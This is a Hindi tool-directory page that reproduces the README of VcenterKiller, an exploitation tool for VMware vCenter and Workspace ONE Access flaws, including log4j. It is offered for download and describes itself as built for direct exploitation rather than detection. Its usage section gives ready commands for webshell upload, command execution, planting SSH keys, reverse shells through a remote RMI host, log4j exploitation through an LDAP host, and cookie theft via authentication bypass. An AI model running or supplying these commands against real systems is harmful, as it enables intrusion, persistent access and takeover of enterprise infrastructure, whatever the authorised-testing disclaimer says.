Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
VcenterKiller — Vcenter के लिए एक व्यापक उपयोग उपकरण, जिसमें वर्तमान में सबसे लोकप्रिय CVE-2021-21972, CVE-2021-21985 और CVE-2021-22005, One Access के CVE-2022-22954, CVE-2022-22972/31656 और log4j शामिल हैं, वेबशेल अपलोड करने, कमांड निष्पादित करने या SSH पासवर्ड रहित कनेक्शन के लिए सार्वजनिक कुंजी अपलोड करने की एक-क्लिक सुविधा प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/schira4396/vcenterkiller
भेद्यता स्कैनरपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगलॉग विश्लेषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHubschira4396/vcenterkiller

VcenterKiller

रिपॉजिटरी देखें
1.5k1662 साल पहलेKitploit द्वारा समीक्षित

Vcenter के लिए एक व्यापक उपयोग उपकरण, जिसमें वर्तमान में सबसे लोकप्रिय CVE-2021-21972, CVE-2021-21985 और CVE-2021-22005, One Access के CVE-2022-22954, CVE-2022-22972/31656 और log4j शामिल हैं, वेबशेल अपलोड करने, कमांड निष्पादित करने या SSH पासवर्ड रहित कनेक्शन के लिए सार्वजनिक कुंजी अपलोड करने की एक-क्लिक सुविधा प्रदान करता है।

साझा करें

vckiller GitHub Downloads (all assets, all releases)

VcenterKiller

-1. ध्यान दें

यदि आप स्थानीय वातावरण में भेद्यता वातावरण स्थापित कर रहे हैं, तो vckiller के साथ log4j को सत्यापित करना मूल रूप से विफल हो जाएगा, क्योंकि Vmware वर्चुअल मशीन वातावरण में NAT मोड का उपयोग करने पर, सत्यापन मॉड्यूल में आउटगोइंग नेटवर्क कार्ड को 127.0.0.1 के रूप में निर्धारित किया जाएगा, इसलिए लक्ष्य द्वारा एक्सेस किया गया LDAP सर्वर पता 127.0.0.1 बन जाता है, और सत्यापन विफल हो जाता है 😏

0. अनिवार्य पठन

यदि आपको कोई बग मिलता है, तो कृपया एक issue बनाएं। यह टूल केवल सुविधा के लिए लिखा गया है; इसमें कुछ भी बहुत उन्नत नहीं है।

1. यह क्या है

Vcenter के लिए एक व्यापक सत्यापन उपकरण, जिसमें सबसे लोकप्रिय CVE-2021-21972, CVE-2021-21985 और CVE-2021-22005 शामिल हैं। यह एक-क्लिक वेबशेल अपलोड, कमांड निष्पादन या सार्वजनिक कुंजी अपलोड और SSH कनेक्शन की सुविधा प्रदान करता है, साथ ही Vcenter पर Apache Log4j CVE-2021-44228 भेद्यता का पता लगाने और शोषण भी करता है, जैसे कमांड निष्पादन और आउटपुट प्राप्त करना (एक ldap दुर्भावनापूर्ण सर्वर की आवश्यकता है)। अब अलग से ldap सर्वर शुरू करने की आवश्यकता नहीं है; मैंने jndi-injection टूल पर आधारित एक शोषण विधि तैयार की है। Vcenter द्वारा उपयोग किया जाने वाला मिडलवेयर Tomcat है, बस TomcatBypass शोषण श्रृंखला का उपयोग करें।

2. इसकी स्थिति

आमतौर पर Vcenter को आंतरिक नेटवर्क में रखा जाता है, और भेद्यता की विशेषताएं भी बहुत सामान्य हैं, जैसे fscan एक स्कैन में सामने आ जाता है। इसलिए VcenterKiller का उपयोग लक्ष्य में भेद्यता की उपस्थिति का पता लगाने के लिए नहीं किया जाता है, बल्कि सीधे शोषण करने का प्रयास किया जाता है। आमतौर पर इसे CS/MSF के माध्यम से जंपबॉक्स पर निष्पादित किया जाता है, इसलिए अन्य फालतू आउटपुट को हटा दिया गया है।

GO का उपयोग क्यों? क्योंकि Python लिखना आसान है लेकिन उपयोग करना परेशानी भरा है, इसमें विभिन्न निर्भरता लाइब्रेरीज़ हैं, और संकलित होने पर आकार बहुत बड़ा होता है। C# क्रॉस-प्लेटफ़ॉर्म नहीं है, इसलिए इसे आधा लिखकर छोड़ दिया गया।

3. उपयोग विधि

root@kitploit:~
go build -o main.exe

./main.exe -u https://192.168.1.1 -m 21985 -c whoami
./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp
./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh // सार्वजनिक कुंजी अपलोड करें
./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx
./main.exe -u https://192.168.1.1 -m log4center -t scan // log4j स्कैन करें
./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami // ldap सेवा निर्दिष्ट किए बिना भी कर सकते हैं
./main.exe -u https://xx.xx.com -m 22954 whoami
./main.exe -u https://xx.xx.com -m 22972 // कुकी प्राप्त करें
./main.exe -u https://xx.xx.com -m 31656 // यदि CVE-2022-22972 काम नहीं करता है, तो CVE-2022-31656 का उपयोग करें

4. अस्वीकरण

यह उपकरण केवल कानूनी रूप से अधिकृत उद्यम सुरक्षा निर्माण गतिविधियों, जैसे आंतरिक हमले और बचाव अभ्यास, भेद्यता सत्यापन और पुनः परीक्षण के लिए है। यदि आपको इस उपकरण की कार्यक्षमता का परीक्षण करने की आवश्यकता है, तो कृपया स्वयं एक लक्ष्य वातावरण स्थापित करें।

इस उपकरण का उपयोग करते समय, आपको यह सुनिश्चित करना चाहिए कि कार्रवाई स्थानीय कानूनों और विनियमों का अनुपालन करती है, और आपने पर्याप्त प्राधिकरण प्राप्त कर लिया है। अनधिकृत लक्ष्यों पर उपयोग न करें।

यदि आप इस उपकरण का उपयोग करते समय कोई अवैध गतिविधि करते हैं, तो आपको स्वयं परिणाम भुगतने होंगे, और हम कोई कानूनी या संबद्ध देयता नहीं लेंगे।

5. अद्यतन लॉग

root@kitploit:~
V1.0 लॉन्च
V1.1 CVE-2021-21985 के लिए rmi के माध्यम से रिवर्स शेल फ़ंक्शन जोड़ा गया, लेकिन आपको एक rmi सर्वर शुरू करना होगा, उदाहरण के लिए jndi-injection-exploit
V1.2 Vcenter के लिए log4j का पता लगाने और सत्यापन क्षमता जोड़ी गई
V1.3 Vmware WorkSpace One Access के लिए भेद्यता सत्यापन फ़ंक्शन जोड़ा गया, जिसमें CVE-2022-22954 दूरस्थ कमांड निष्पादन; CVE-2022-22972, CVE-2022-31656 पहचान बाईपास शामिल हैं
V1.3.1 log4j का पता लगाते समय पोर्ट को अनदेखा करने की समस्या ठीक की गई; कुछ सेवाएं डिफ़ॉल्ट 443 पोर्ट बदल देती हैं
V1.3.2 log4j के शोषण के तरीके को संशोधित किया गया, अब tomcatbypassEcho के माध्यम से कमांड निष्पादित करता है और आउटपुट वापस प्राप्त करता है। vcenter 7.0 linux पर परीक्षण पास
V1.3.3 6.7 और 7.0 संस्करणों के बीच अंतर शोषण जोड़ा गया; 7.0 को tomcatbypass का उपयोग करना होगा, जबकि 6.7 सामान्य basic का उपयोग कर सकता है
V1.3.4 log4j के सत्यापन तर्क को संशोधित किया गया; वर्तमान तर्क यह है कि 5 बार विभिन्न पेलोड को बिना भेदभाव के भेजा जाता है; यदि आउटपुट है तो है, नहीं तो नहीं
V1.3.5 log4j की Jndi-Injection-Exploit पर निर्भरता समाप्त की गई; सीधे कमांड निष्पादित कर सकता है और आउटपुट प्राप्त कर सकता है
V1.3.6 21972 के ssh फ़ंक्शन को संशोधित किया गया और अन्य विवरणों को अनुकूलित किया गया
V1.3.7 प्रॉक्सी फ़ंक्शन जोड़ा गया, http और socks का समर्थन करता है
V1.3.8 अभी शुरू नहीं हुआ है, फ़ंक्शन जोड़ने पर विचार कर रहा हूं...
...
टूल डाउनलोड करें